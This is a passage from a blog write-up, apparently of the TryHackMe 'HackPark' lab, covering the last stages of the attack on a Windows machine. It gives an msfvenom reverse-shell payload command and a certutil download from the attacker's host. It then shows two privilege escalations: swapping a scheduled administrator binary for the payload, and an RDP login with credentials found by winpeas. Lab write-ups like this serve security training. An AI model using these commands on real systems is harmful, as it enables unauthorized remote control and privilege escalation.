</span></span></code></pre></div><p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632578661936/vR_ukso02.png" alt="image.png"  />
</p>
<p>The shell is not stable so let&rsquo;s create a msfvenom payload and upload it to the machine  👇🏻</p>
<p>1.On our machine
-&gt; <code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.30.219 LPORT=4444 -f exe &gt; shell.exe</code></p>
<p>2.On victim machine, go to <code>C:\Users\Public</code> which is usually world writable directory and grab the msfvenom payload from our machine</p>
<p>-&gt; <code>certutil.exe  -urlcache  -f  http://10.11.30.219:8000/shell.exe shell.exe</code></p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632579225735/TXTV_37TU.png" alt="image.png"  />
</p>
<p>3.Execute <code>shell.exe</code> to get back a stable shell in msf .</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632579262972/kzgeaWJy_.png" alt="image.png"  />
</p>
<h2 id="privilege-escalation--">Privilege Escalation -<a hidden class="anchor" aria-hidden="true" href="#privilege-escalation--">#</a></h2>
<hr>
<p>Running <strong>sysinfo</strong> tells us that we are on a 64-bit machine.</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632579373274/FkXwERmRs.png" alt="image.png"  />
</p>
<p>There are 2 users on the system - <code>jeff</code> and <code>administrator</code></p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632579449798/TJtYNuvis.png" alt="image.png"  />
</p>
<p>I quickly transferred <code>winpeas</code> to the target machine and ran it</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632579620979/qkGVKtlTV.png" alt="image.png"  />
</p>
<p>There were 2 way to priv-esc as admin user</p>
<h4 id="method-1--">Method 1 -<a hidden class="anchor" aria-hidden="true" href="#method-1--">#</a></h4>
<p>Running winpeas tells us that we have permissions to modify the following system-scheduler service binary</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632580309744/Aa1-bR5Gw.png" alt="image.png"  />
</p>
<p><code>C:\Program Files (x86)\SystemScheduler</code> - contains all the executables run by the scheduler.But we need to know which .exe is being executed by the systemscheduler.</p>
<blockquote>
<p>NOTE - Scheduler is similar to something like cron in Linux</p>
</blockquote>
<p>So lets check the <code>Events</code> directory inside the SystemScheduler folder which contains the systemlog files.
The <strong>20198415519.INI_LOG.txt</strong> file contains the info we need! From the contents of the log file we could understand that  the  <code>Message.exe</code> <strong>is being run by administrator every 30 seconds</strong>.</p>
<p>To exploit this  just follow the steps ,</p>
<p>1.Rename <code>Message.exe</code> to <code>Message.bak</code></p>
<p>2.Move <code>shell.exe</code> which we previously used to gain a stable shell to this current directory <code>C:\Program Files (x86)\SystemScheduler</code></p>
<p>3.Rename shell.exe to Message.exe.</p>
<p>4.<strong>Setup a netcat listener on our local machine and wait for 30 seconds to get a shell back as administrator !</strong></p>
<h4 id="method-2--">Method 2 -<a hidden class="anchor" aria-hidden="true" href="#method-2--">#</a></h4>
<p>Winpeas output gave us these credentials 👇🏻</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632583429899/ugC7-P3dz.png" alt="image.png"  />

Remember ? We had port 3389 open which is RDP.</p>
<p>Let&rsquo;s try logging in using xfreerdp</p>
<ul>
<li><code>xfreerdp /u:administrator /v:10.10.176.92:3389 /cert:ignore /p:4q6XvFES7Fdxs </code></li>
</ul>
<p>Aaandd we&rsquo;re in !</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632583779267/Z29rNAPJz.png" alt="image.png"  />
</p>
<p>Grab the <code>user.txt</code> 🚩</p>
<ul>
<li>Open command prompt, navigate  <code>C:\Users\jeff\Desktop</code> and grab the user flag
<img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632588958789/q8t-bRsxA.png" alt="image.png"  />
</li>
</ul>
<p>Grab <code>root.txt</code> 🚩</p>
<ul>
<li>root.txt file is on the Desktop of admin user .</li>
</ul>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632589030217/5ExrAwXGR.png" alt="image.png"  />
</p>


  </div>

  <footer class="post-footer">
    <ul class="post-tags">
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/blogengine/">blogengine</a></li>
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/autologon-credentials/">autologon-credentials</a></li>
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/rdp/">rdp</a></li>
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/systemscheduler/">systemscheduler</a></li>
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/winpeas/">winpeas</a></li>
      <li><a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/tryhackme/">tryhackme</a></li>
    </ul>
<nav class="paginav">
  <a class="prev" href="https://sh3bu.github.io/themes/hugo-PaperMod/posts/dailybugle/">
    <span class="title">« Prev</span>
    <br>
    <span>Daily Bugle - THM</span>
  </a>
  <a class="next" href="https://sh3bu.github.io/themes/hugo-PaperMod/posts/retro/">
    <span class="title">Next »</span>
    <br>
    <span>Retro - THM</span>
  </a>
</nav>


<div class="share-buttons">
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on twitter"
        href="https://twitter.com/intent/tweet/?text=HackPark%20-%20THM&amp;url=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f&amp;hashtags=blogengine%2cautologon-credentials%2crdp%2csystemscheduler%2cwinpeas%2ctryhackme">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve" height="30px" width="30px" fill="currentColor">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-253.927,424.544c135.939,0 210.268,-112.643 210.268,-210.268c0,-3.218 0,-6.437 -0.153,-9.502c14.406,-10.421 26.973,-23.448 36.935,-38.314c-13.18,5.824 -27.433,9.809 -42.452,11.648c15.326,-9.196 26.973,-23.602 32.49,-40.92c-14.252,8.429 -30.038,14.56 -46.896,17.931c-13.487,-14.406 -32.644,-23.295 -53.946,-23.295c-40.767,0 -73.87,33.104 -73.87,73.87c0,5.824 0.613,11.494 1.992,16.858c-61.456,-3.065 -115.862,-32.49 -152.337,-77.241c-6.284,10.881 -9.962,23.601 -9.962,37.088c0,25.594 13.027,48.276 32.95,61.456c-12.107,-0.307 -23.448,-3.678 -33.41,-9.196l0,0.92c0,35.862 25.441,65.594 59.311,72.49c-6.13,1.686 -12.72,2.606 -19.464,2.606c-4.751,0 -9.348,-0.46 -13.946,-1.38c9.349,29.426 36.628,50.728 68.965,51.341c-25.287,19.771 -57.164,31.571 -91.8,31.571c-5.977,0 -11.801,-0.306 -17.625,-1.073c32.337,21.15 71.264,33.41 112.95,33.41Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on linkedin"
        href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f&amp;title=HackPark%20-%20THM&amp;summary=HackPark%20-%20THM&amp;source=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve" height="30px" width="30px" fill="currentColor">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-288.985,423.278l0,-225.717l-75.04,0l0,225.717l75.04,0Zm270.539,0l0,-129.439c0,-69.333 -37.018,-101.586 -86.381,-101.586c-39.804,0 -57.634,21.891 -67.617,37.266l0,-31.958l-75.021,0c0.995,21.181 0,225.717 0,225.717l75.02,0l0,-126.056c0,-6.748 0.486,-13.492 2.474,-18.315c5.414,-13.475 17.767,-27.434 38.494,-27.434c27.135,0 38.007,20.707 38.007,51.037l0,120.768l75.024,0Zm-307.552,-334.556c-25.674,0 -42.448,16.879 -42.448,39.002c0,21.658 16.264,39.002 41.455,39.002l0.484,0c26.165,0 42.452,-17.344 42.452,-39.002c-0.485,-22.092 -16.241,-38.954 -41.943,-39.002Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on reddit"
        href="https://reddit.com/submit?url=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f&title=HackPark%20-%20THM">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve" height="30px" width="30px" fill="currentColor">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-3.446,265.638c0,-22.964 -18.616,-41.58 -41.58,-41.58c-11.211,0 -21.361,4.457 -28.841,11.666c-28.424,-20.508 -67.586,-33.757 -111.204,-35.278l18.941,-89.121l61.884,13.157c0.756,15.734 13.642,28.29 29.56,28.29c16.407,0 29.706,-13.299 29.706,-29.701c0,-16.403 -13.299,-29.702 -29.706,-29.702c-11.666,0 -21.657,6.792 -26.515,16.578l-69.105,-14.69c-1.922,-0.418 -3.939,-0.042 -5.585,1.036c-1.658,1.073 -2.811,2.761 -3.224,4.686l-21.152,99.438c-44.258,1.228 -84.046,14.494 -112.837,35.232c-7.468,-7.164 -17.589,-11.591 -28.757,-11.591c-22.965,0 -41.585,18.616 -41.585,41.58c0,16.896 10.095,31.41 24.568,37.918c-0.639,4.135 -0.99,8.328 -0.99,12.576c0,63.977 74.469,115.836 166.33,115.836c91.861,0 166.334,-51.859 166.334,-115.836c0,-4.218 -0.347,-8.387 -0.977,-12.493c14.564,-6.47 24.735,-21.034 24.735,-38.001Zm-119.474,108.193c-20.27,20.241 -59.115,21.816 -70.534,21.816c-11.428,0 -50.277,-1.575 -70.522,-21.82c-3.007,-3.008 -3.007,-7.882 0,-10.889c3.003,-2.999 7.882,-3.003 10.885,0c12.777,12.781 40.11,17.317 59.637,17.317c19.522,0 46.86,-4.536 59.657,-17.321c3.016,-2.999 7.886,-2.995 10.885,0.008c3.008,3.011 3.003,7.882 -0.008,10.889Zm-5.23,-48.781c-16.373,0 -29.701,-13.324 -29.701,-29.698c0,-16.381 13.328,-29.714 29.701,-29.714c16.378,0 29.706,13.333 29.706,29.714c0,16.374 -13.328,29.698 -29.706,29.698Zm-160.386,-29.702c0,-16.381 13.328,-29.71 29.714,-29.71c16.369,0 29.689,13.329 29.689,29.71c0,16.373 -13.32,29.693 -29.689,29.693c-16.386,0 -29.714,-13.32 -29.714,-29.693Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on facebook"
        href="https://facebook.com/sharer/sharer.php?u=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve" height="30px" width="30px" fill="currentColor">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-106.468,0l0,-192.915l66.6,0l12.672,-82.621l-79.272,0l0,-53.617c0,-22.603 11.073,-44.636 46.58,-44.636l36.042,0l0,-70.34c0,0 -32.71,-5.582 -63.982,-5.582c-65.288,0 -107.96,39.569 -107.96,111.204l0,62.971l-72.573,0l0,82.621l72.573,0l0,192.915l-191.104,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on whatsapp"
        href="https://api.whatsapp.com/send?text=HackPark%20-%20THM%20-%20https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve" height="30px" width="30px" fill="currentColor">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-58.673,127.703c-33.842,-33.881 -78.847,-52.548 -126.798,-52.568c-98.799,0 -179.21,80.405 -179.249,179.234c-0.013,31.593 8.241,62.428 23.927,89.612l-25.429,92.884l95.021,-24.925c26.181,14.28 55.659,21.807 85.658,21.816l0.074,0c98.789,0 179.206,-80.413 179.247,-179.243c0.018,-47.895 -18.61,-92.93 -52.451,-126.81Zm-126.797,275.782l-0.06,0c-26.734,-0.01 -52.954,-7.193 -75.828,-20.767l-5.441,-3.229l-56.386,14.792l15.05,-54.977l-3.542,-5.637c-14.913,-23.72 -22.791,-51.136 -22.779,-79.287c0.033,-82.142 66.867,-148.971 149.046,-148.971c39.793,0.014 77.199,15.531 105.329,43.692c28.128,28.16 43.609,65.592 43.594,105.4c-0.034,82.149 -66.866,148.983 -148.983,148.984Zm81.721,-111.581c-4.479,-2.242 -26.499,-13.075 -30.604,-14.571c-4.105,-1.495 -7.091,-2.241 -10.077,2.241c-2.986,4.483 -11.569,14.572 -14.182,17.562c-2.612,2.988 -5.225,3.364 -9.703,1.12c-4.479,-2.241 -18.91,-6.97 -36.017,-22.23c-13.314,-11.876 -22.304,-26.542 -24.916,-31.026c-2.612,-4.484 -0.279,-6.908 1.963,-9.14c2.016,-2.007 4.48,-5.232 6.719,-7.847c2.24,-2.615 2.986,-4.484 4.479,-7.472c1.493,-2.99 0.747,-5.604 -0.374,-7.846c-1.119,-2.241 -10.077,-24.288 -13.809,-33.256c-3.635,-8.733 -7.327,-7.55 -10.077,-7.688c-2.609,-0.13 -5.598,-0.158 -8.583,-0.158c-2.986,0 -7.839,1.121 -11.944,5.604c-4.105,4.484 -15.675,15.32 -15.675,37.364c0,22.046 16.048,43.342 18.287,46.332c2.24,2.99 31.582,48.227 76.511,67.627c10.685,4.615 19.028,7.371 25.533,9.434c10.728,3.41 20.492,2.929 28.209,1.775c8.605,-1.285 26.499,-10.833 30.231,-21.295c3.732,-10.464 3.732,-19.431 2.612,-21.298c-1.119,-1.869 -4.105,-2.99 -8.583,-5.232Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share HackPark - THM on telegram"
        href="https://telegram.me/share/url?text=HackPark%20-%20THM&amp;url=https%3a%2f%2fsh3bu.github.io%2fthemes%2fhugo-PaperMod%2fposts%2fhackpark%2f">
        <svg version="1.1" xml:space="preserve" viewBox="2 2 28 28" height="30px" width="30px" fill="currentColor">
            <path
                d="M26.49,29.86H5.5a3.37,3.37,0,0,1-2.47-1,3.35,3.35,0,0,1-1-2.47V5.48A3.36,3.36,0,0,1,3,3,3.37,3.37,0,0,1,5.5,2h21A3.38,3.38,0,0,1,29,3a3.36,3.36,0,0,1,1,2.46V26.37a3.35,3.35,0,0,1-1,2.47A3.38,3.38,0,0,1,26.49,29.86Zm-5.38-6.71a.79.79,0,0,0,.85-.66L24.73,9.24a.55.55,0,0,0-.18-.46.62.62,0,0,0-.41-.17q-.08,0-16.53,6.11a.59.59,0,0,0-.41.59.57.57,0,0,0,.43.52l4,1.24,1.61,4.83a.62.62,0,0,0,.63.43.56.56,0,0,0,.4-.17L16.54,20l4.09,3A.9.9,0,0,0,21.11,23.15ZM13.8,20.71l-1.21-4q8.72-5.55,8.78-5.55c.15,0,.23,0,.23.16a.18.18,0,0,1,0,.06s-2.51,2.3-7.52,6.8Z" />
        </svg>
    </a>
</div>
  </footer>
</article>
    </main>
    
<footer class="footer">
    <span>&copy; 2023 <a href="https://sh3bu.github.io/themes/hugo-PaperMod">Shebu 🔽</a></span>
    <span>
        Powered by
        <a href="https://gohugo.io/" rel="noopener noreferrer" target="_blank">Hugo</a> &
        <a href="https://github.com/adityatelange/hugo-PaperMod/" rel="noopener" target="_blank">PaperMod</a>
    </span>
</footer>
<a href="#top" aria-label="go to top" title="Go to Top (Alt + G)" class="top-link" id="top-link" accesskey="g">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentColor">
        <path d="M12 6H0l6-6z" />
    </svg>
</a>

<script>
    let menu = document.getElementById('menu')
    if (menu) {
        menu.scrollLeft = localStorage.getItem("menu-scroll-position");
        menu.onscroll = function () {
            localStorage.setItem("menu-scroll-position", menu.scrollLeft);
        }
    }

    document.querySelectorAll('a[href^="#"]').forEach(anchor => {
        anchor.addEventListener("click", function (e) {
            e.preventDefault();
            var id = this.getAttribute("href").substr(1);
            if (!window.matchMedia('(prefers-reduced-motion: reduce)').matches) {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView({
                    behavior: "smooth"
                });
            } else {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView();
            }
            if (id === "top") {
                history.replaceState(null, null, " ");
            } else {
                history.pushState(null, null, `#${id}`);
            }
        });
    });

</script>
<script>
    var mybutton = document.getElementById("top-link");
    window.onscroll = function () {
        if (document.body.scrollTop > 800 || document.documentElement.scrollTop > 800) {
            mybutton.style.visibility = "visible";
            mybutton.style.opacity = "1";
        } else {
            mybutton.style.visibility = "hidden";
            mybutton.style.opacity = "0";
        }
    };

</script>
<script>
    document.getElementById("theme-toggle").addEventListener("click", () => {
        if (document.body.className.includes("dark")) {
            document.body.classList.remove('dark');
            localStorage.setItem("pref-theme", 'light');
        } else {
            document.body.classList.add('dark');
            localStorage.setItem("pref-theme", 'dark');
        }
    })

</script>
<script>
    document.querySelectorAll('pre > code').forEach((codeblock) => {
        const container = codeblock.parentNode.parentNode;

        const copybutton = document.createElement('button');
        copybutton.classList.add('copy-code');
        copybutton.innerHTML = 'copy';

        function copyingDone() {
            copybutton.innerHTML = 'copied!';
            setTimeout(() => {
                copybutton.innerHTML = 'copy';
            }, 2000);
        }

        copybutton.addEventListener('click', (cb) => {
            if ('clipboard' in navigator) {
                navigator.clipboard.writeText(codeblock.textContent);
                copyingDone();
                return;
            }

            const range = document.createRange();
            range.selectNodeContents(codeblock);
            const selection = window.getSelection();
            selection.removeAllRanges();
            selection.addRange(range);
            try {
                document.execCommand('copy');
                copyingDone();
            } catch (e) { };
            selection.removeRange(range);
        });

        if (container.classList.contains("highlight")) {
            container.appendChild(copybutton);
        } else if (container.parentNode.firstChild == container) {
            
        } else if (codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName == "TABLE") {
            
            codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(copybutton);
        } else {
            
            codeblock.parentNode.appendChild(copybutton);
        }
    });
</script>
</body>

</html>
